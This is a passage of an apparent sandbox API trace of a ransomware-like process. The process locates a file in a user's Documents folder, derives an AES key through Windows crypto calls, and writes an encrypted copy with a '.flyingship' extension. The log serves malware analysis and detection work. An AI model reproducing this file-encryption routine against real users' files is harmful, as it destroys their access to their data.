lpString2="flyingship", cchCount2=10) returned 3 [0179.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bxf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.325] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xf\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="orhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rhLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hLGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LGiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GiSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iSQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SQMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QMqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MqRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qRNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RNAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NAIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AIhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IhM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hM\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\T8zO.ots\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.326] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0179.326] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0179.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ots", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.326] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ots", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0179.326] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c77ab30, ftCreationTime.dwHighDateTime=0x1d5dfc3, ftLastAccessTime.dwLowDateTime=0x99fe6ad0, ftLastAccessTime.dwHighDateTime=0x1d5d97b, ftLastWriteTime.dwLowDateTime=0x99fe6ad0, ftLastWriteTime.dwHighDateTime=0x1d5d97b, nFileSizeHigh=0x0, nFileSizeLow=0xa8f4, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="T8zO.ots", cAlternateFileName="")) returned 0x90af58 [0179.327] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0179.327] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0179.327] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.327] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0179.327] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0179.327] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.327] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0179.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0179.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0179.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0179.327] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0179.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0179.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0179.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0179.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0179.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0179.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0179.329] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0179.329] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0179.329] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0179.329] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0179.329] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.329] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0179.329] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.329] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0179.329] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0179.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0179.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0179.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0179.329] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0179.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0179.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0179.329] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0179.329] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.329] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.329] CryptHashData (hHash=0x90ae18, pbData=0x8dedf8, dwDataLen=0x19, dwFlags=0x1) returned 1 [0179.330] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.330] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0179.330] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.330] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0179.346] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.346] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.346] CryptDestroyHash (hHash=0x90ae18) returned 1 [0179.347] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm\\t8zo.ots"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0179.347] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.348] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0179.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0179.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0179.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0179.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0179.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0179.348] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0179.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0179.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0179.348] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0179.348] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0179.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0179.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0179.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0179.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0179.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0179.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3540 | out: hHeap=0x8a0000) returned 1 [0179.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0179.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0179.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0179.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0179.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0179.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0179.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0179.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.349] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm")) returned 0x10 [0179.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0179.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0179.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0179.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0179.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0179.349] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.flyingship.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm\\t8zo.flyingship.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0179.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0179.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0179.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0179.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0179.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0179.350] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0179.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0179.350] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0179.350] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.350] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0179.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0179.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.351] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0179.351] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xa8f4, lpOverlapped=0x0) returned 1 [0179.353] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0179.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0179.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0179.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0179.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0179.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0179.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0179.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0179.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0179.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.354] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0179.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0179.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0179.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0179.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.354] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0179.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.355] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.355] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0179.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0179.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0179.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0179.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0179.355] HeapFree (in: 